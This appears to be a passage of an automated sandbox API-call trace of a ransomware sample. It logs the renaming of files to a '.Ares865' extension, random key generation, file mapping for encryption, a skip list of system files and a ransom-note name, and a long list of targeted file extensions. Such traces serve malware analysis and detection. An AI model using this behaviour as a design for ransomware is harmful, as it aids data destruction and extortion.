"c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.670] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1052) returned 1 [0055.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.670] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.671] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.671] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.671] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x120 [0055.675] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x190000 [0055.676] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.677] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.677] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.701] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad.Ares865") returned 60 [0055.701] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad.ares865"), dwFlags=0x1) returned 1 [0055.709] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.709] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=489) returned 1 [0055.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0055.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.709] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.710] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.710] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.710] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f0, lpName=0x0) returned 0x120 [0055.717] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f0) returned 0x190000 [0055.718] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.718] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.718] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0055.722] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat.Ares865") returned 59 [0055.722] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat.ares865"), dwFlags=0x1) returned 1 [0055.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.723] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=65) returned 1 [0055.723] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0055.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.724] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.725] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.725] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.725] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x120 [0055.727] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0055.727] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.728] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.728] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0055.735] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis.Ares865") returned 64 [0055.735] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis.ares865"), dwFlags=0x1) returned 1 [0055.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.736] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=117) returned 1 [0055.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0055.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.737] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.737] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.737] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.738] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x380, lpName=0x0) returned 0x120 [0055.742] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x380) returned 0x190000 [0055.743] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.744] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.744] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0055.758] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute.Ares865") returned 64 [0055.758] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute.ares865"), dwFlags=0x1) returned 1 [0055.759] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.759] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1052) returned 1 [0055.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0055.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0055.759] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0055.760] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.760] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0055.760] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x120 [0055.763] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x190000 [0055.770] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0055.780] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.781] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0055.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0055.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0055.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0055.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0055.786] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0055.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0055.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0055.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0055.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0055.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0055.797] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0055.797] CloseHandle (hObject=0x120) returned 1 [0055.797] CloseHandle (hObject=0x118) returned 1 [0055.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0055.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0055.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0055.798] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x131, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rio_Branco", cAlternateFileName="RIO_BR~1")) returned 1 [0055.799] lstrcmpiW (lpString1="Rio_Branco", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.799] lstrcmpiW (lpString1="Rio_Branco", lpString2="aoldtz.exe") returned 1 [0055.799] lstrcmpiW (lpString1="Rio_Branco", lpString2=".") returned 1 [0055.799] lstrcmpiW (lpString1="Rio_Branco", lpString2="..") returned 1 [0055.800] lstrcmpiW (lpString1="Rio_Branco", lpString2="windows") returned -1 [0055.801] lstrcmpiW (lpString1="Rio_Branco", lpString2="bootmgr") returned 1 [0055.802] lstrcmpiW (lpString1="Rio_Branco", lpString2="temp") returned -1 [0055.802] lstrcmpiW (lpString1="Rio_Branco", lpString2="pagefile.sys") returned 1 [0055.803] lstrcmpiW (lpString1="Rio_Branco", lpString2="boot") returned 1 [0055.804] lstrcmpiW (lpString1="Rio_Branco", lpString2="ids.txt") returned 1 [0055.805] lstrcmpiW (lpString1="Rio_Branco", lpString2="ntuser.dat") returned 1 [0055.805] lstrcmpiW (lpString1="Rio_Branco", lpString2="perflogs") returned 1 [0055.806] lstrcmpiW (lpString1="Rio_Branco", lpString2="MSBuild") returned 1 [0055.807] lstrlenW (lpString="Rio_Branco") returned 10 [0055.808] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute") returned 56 [0055.808] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Rio_Branco" | out: lpString1="Rio_Branco") returned="Rio_Branco" [0055.809] lstrlenW (lpString="Rio_Branco") returned 10 [0055.811] lstrlenW (lpString="Ares865") returned 7 [0055.813] lstrcmpiW (lpString1="_Branco", lpString2="Ares865") returned -1 [0055.813] lstrlenW (lpString=".dll") returned 4 [0055.814] lstrcmpiW (lpString1="Rio_Branco", lpString2=".dll") returned 1 [0055.816] lstrlenW (lpString=".lnk") returned 4 [0055.816] lstrcmpiW (lpString1="Rio_Branco", lpString2=".lnk") returned 1 [0055.816] lstrlenW (lpString=".ini") returned 4 [0055.816] lstrcmpiW (lpString1="Rio_Branco", lpString2=".ini") returned 1 [0055.816] lstrlenW (lpString=".sys") returned 4 [0055.816] lstrcmpiW (lpString1="Rio_Branco", lpString2=".sys") returned 1 [0055.816] lstrlenW (lpString="Rio_Branco") returned 10 [0055.816] lstrlenW (lpString="bak") returned 3 [0055.820] lstrcmpiW (lpString1="nco", lpString2="bak") returned 1 [0055.820] lstrlenW (lpString="ba_") returned 3 [0055.821] lstrcmpiW (lpString1="nco", lpString2="ba_") returned 1 [0055.823] lstrlenW (lpString="dbb") returned 3 [0055.827] lstrcmpiW (lpString1="nco", lpString2="dbb") returned 1 [0055.827] lstrlenW (lpString="vmdk") returned 4 [0055.828] lstrcmpiW (lpString1="anco", lpString2="vmdk") returned -1 [0055.829] lstrlenW (lpString="rar") returned 3 [0055.829] lstrcmpiW (lpString1="nco", lpString2="rar") returned -1 [0055.829] lstrlenW (lpString="zip") returned 3 [0055.829] lstrcmpiW (lpString1="nco", lpString2="zip") returned -1 [0055.829] lstrlenW (lpString="tgz") returned 3 [0055.832] lstrcmpiW (lpString1="nco", lpString2="tgz") returned -1 [0055.832] lstrlenW (lpString="vbox") returned 4 [0055.833] lstrcmpiW (lpString1="anco", lpString2="vbox") returned -1 [0055.833] lstrlenW (lpString="vdi") returned 3 [0055.833] lstrcmpiW (lpString1="nco", lpString2="vdi") returned -1 [0055.834] lstrlenW (lpString="vhd") returned 3 [0055.834] lstrcmpiW (lpString1="nco", lpString2="vhd") returned -1 [0055.835] lstrlenW (lpString="vhdx") returned 4 [0055.836] lstrcmpiW (lpString1="anco", lpString2="vhdx") returned -1 [0055.837] lstrlenW (lpString="avhd") returned 4 [0055.839] lstrcmpiW (lpString1="anco", lpString2="avhd") returned -1 [0055.840] lstrlenW (lpString="db") returned 2 [0055.841] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0055.842] lstrlenW (lpString="db2") returned 3 [0055.843] lstrcmpiW (lpString1="nco", lpString2="db2") returned 1 [0055.844] lstrlenW (lpString="db3") returned 3 [0055.845] lstrcmpiW (lpString1="nco", lpString2="db3") returned 1 [0055.845] lstrlenW (lpString="dbf") returned 3 [0055.846] lstrcmpiW (lpString1="nco", lpString2="dbf") returned 1 [0055.846] lstrlenW (lpString="mdf") returned 3 [0055.848] lstrcmpiW (lpString1="nco", lpString2="mdf") returned 1 [0055.849] lstrlenW (lpString="mdb") returned 3 [0055.849] lstrcmpiW (lpString1="nco", lpString2="mdb") returned 1 [0055.849] lstrlenW (lpString="sql") returned 3 [0055.849] lstrcmpiW (lpString1="nco", lpString2="sql") returned -1 [0055.849] lstrlenW (lpString="sqlite") returned 6 [0055.849] lstrcmpiW (lpString1="Branco", lpString2="sqlite") returned -1 [0055.850] lstrlenW (lpString="sqlite3") returned 7 [0055.850] lstrcmpiW (lpString1="_Branco", lpString2="sqlite3") returned -1 [0055.850] lstrlenW (lpString="sqlitedb") returned 8 [0055.850] lstrcmpiW (lpString1="o_Branco", lpString2="sqlitedb") returned -1 [0055.850] lstrlenW (lpString="xml") returned 3 [0055.850] lstrcmpiW (lpString1="nco", lpString2="xml") returned -1 [0055.850] lstrlenW (lpString="$er") returned 3 [0055.850] lstrcmpiW (lpString1="nco", lpString2="$er") returned 1 [0055.850] lstrlenW (lpString="4dd") returned 3 [0055.850] lstrcmpiW (lpString1="nco", lpString2="4dd") returned 1 [0055.850] lstrlenW (lpString="4dl") returned 3 [0055.850] lstrcmpiW (lpString1="nco", lpString2="4dl") returned 1 [0055.850] lstrlenW (lpString="^^^") returned 3 [0055.850] lstrcmpiW (lpString1="nco", lpString2="^^^") returned 1 [0055.850] lstrlenW (lpString="abs") returned 3 [0055.850] lstrcmpiW (lpString1="nco", lpString2="abs") returned 1 [0055.850] lstrlenW (lpString="abx") returned 3 [0055.850] lstrcmpiW (lpString1="nco", lpString2="abx") returned 1 [0055.850] lstrlenW (lpString="accdb") returned 5 [0055.850] lstrcmpiW (lpString1="ranco", lpString2="accdb") returned 1 [0055.850] lstrlenW (lpString="accdc") returned 5 [0055.850] lstrcmpiW (lpString1="ranco", lpString2="accdc") returned 1 [0055.850] lstrlenW (lpString="accde") returned 5 [0055.850] lstrcmpiW (lpString1="ranco", lpString2="accde") returned 1 [0055.850] lstrlenW (lpString="accdr") returned 5 [0055.850] lstrcmpiW (lpString1="ranco", lpString2="accdr") returned 1 [0055.850] lstrlenW (lpString="accdt") returned 5 [0055.850] lstrcmpiW (lpString1="ranco", lpString2="accdt") returned 1 [0055.850] lstrlenW (lpString="accdw") returned 5 [0055.850] lstrcmpiW (lpString1="ranco", lpString2="accdw") returned 1 [0055.850] lstrlenW (lpString="accft") returned 5 [0055.850] lstrcmpiW (lpString1="ranco", lpString2="accft") returned 1 [0055.850] lstrlenW (lpString="adb") returned 3 [0055.850] lstrcmpiW (lpString1="nco", lpString2="adb") returned 1 [0055.850] lstrlenW (lpString="adb") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="adb") returned 1 [0055.851] lstrlenW (lpString="ade") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="ade") returned 1 [0055.851] lstrlenW (lpString="adf") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="adf") returned 1 [0055.851] lstrlenW (lpString="adn") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="adn") returned 1 [0055.851] lstrlenW (lpString="adp") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="adp") returned 1 [0055.851] lstrlenW (lpString="alf") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="alf") returned 1 [0055.851] lstrlenW (lpString="ask") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="ask") returned 1 [0055.851] lstrlenW (lpString="btr") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="btr") returned 1 [0055.851] lstrlenW (lpString="cat") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="cat") returned 1 [0055.851] lstrlenW (lpString="cdb") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="cdb") returned 1 [0055.851] lstrlenW (lpString="ckp") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="ckp") returned 1 [0055.851] lstrlenW (lpString="cma") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="cma") returned 1 [0055.851] lstrlenW (lpString="cpd") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="cpd") returned 1 [0055.851] lstrlenW (lpString="dacpac") returned 6 [0055.851] lstrcmpiW (lpString1="Branco", lpString2="dacpac") returned -1 [0055.851] lstrlenW (lpString="dad") returned 3 [0055.851] lstrcmpiW (lpString1="nco", lpString2="dad") returned 1 [0055.851] lstrlenW (lpString="dadiagrams") returned 10 [0055.851] lstrlenW (lpString="daschema") returned 8 [0055.851] lstrcmpiW (lpString1="o_Branco", lpString2="daschema") returned 1 [0055.851] lstrlenW (lpString="db-journal") returned 10 [0055.851] lstrlenW (lpString="db-shm") returned 6 [0055.851] lstrcmpiW (lpString1="Branco", lpString2="db-shm") returned -1 [0055.851] lstrlenW (lpString="db-wal") returned 6 [0055.851] lstrcmpiW (lpString1="Branco", lpString2="db-wal") returned -1 [0055.852] lstrlenW (lpString="dbc") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dbc") returned 1 [0055.852] lstrlenW (lpString="dbs") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dbs") returned 1 [0055.852] lstrlenW (lpString="dbt") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dbt") returned 1 [0055.852] lstrlenW (lpString="dbv") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dbv") returned 1 [0055.852] lstrlenW (lpString="dbx") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dbx") returned 1 [0055.852] lstrlenW (lpString="dcb") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dcb") returned 1 [0055.852] lstrlenW (lpString="dct") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dct") returned 1 [0055.852] lstrlenW (lpString="dcx") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dcx") returned 1 [0055.852] lstrlenW (lpString="ddl") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="ddl") returned 1 [0055.852] lstrlenW (lpString="dlis") returned 4 [0055.852] lstrcmpiW (lpString1="anco", lpString2="dlis") returned -1 [0055.852] lstrlenW (lpString="dp1") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dp1") returned 1 [0055.852] lstrlenW (lpString="dqy") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dqy") returned 1 [0055.852] lstrlenW (lpString="dsk") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dsk") returned 1 [0055.852] lstrlenW (lpString="dsn") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dsn") returned 1 [0055.852] lstrlenW (lpString="dtsx") returned 4 [0055.852] lstrcmpiW (lpString1="anco", lpString2="dtsx") returned -1 [0055.852] lstrlenW (lpString="dxl") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="dxl") returned 1 [0055.852] lstrlenW (lpString="eco") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="eco") returned 1 [0055.852] lstrlenW (lpString="ecx") returned 3 [0055.852] lstrcmpiW (lpString1="nco", lpString2="ecx") returned 1 [0055.852] lstrlenW (lpString="edb") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="edb") returned 1 [0055.853] lstrlenW (lpString="epim") returned 4 [0055.853] lstrcmpiW (lpString1="anco", lpString2="epim") returned -1 [0055.853] lstrlenW (lpString="fcd") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fcd") returned 1 [0055.853] lstrlenW (lpString="fdb") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fdb") returned 1 [0055.853] lstrlenW (lpString="fic") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fic") returned 1 [0055.853] lstrlenW (lpString="flexolibrary") returned 12 [0055.853] lstrlenW (lpString="fm5") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fm5") returned 1 [0055.853] lstrlenW (lpString="fmp") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fmp") returned 1 [0055.853] lstrlenW (lpString="fmp12") returned 5 [0055.853] lstrcmpiW (lpString1="ranco", lpString2="fmp12") returned 1 [0055.853] lstrlenW (lpString="fmpsl") returned 5 [0055.853] lstrcmpiW (lpString1="ranco", lpString2="fmpsl") returned 1 [0055.853] lstrlenW (lpString="fol") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fol") returned 1 [0055.853] lstrlenW (lpString="fp3") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fp3") returned 1 [0055.853] lstrlenW (lpString="fp4") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fp4") returned 1 [0055.853] lstrlenW (lpString="fp5") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fp5") returned 1 [0055.853] lstrlenW (lpString="fp7") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fp7") returned 1 [0055.853] lstrlenW (lpString="fpt") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="fpt") returned 1 [0055.853] lstrlenW (lpString="frm") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="frm") returned 1 [0055.853] lstrlenW (lpString="gdb") returned 3 [0055.853] 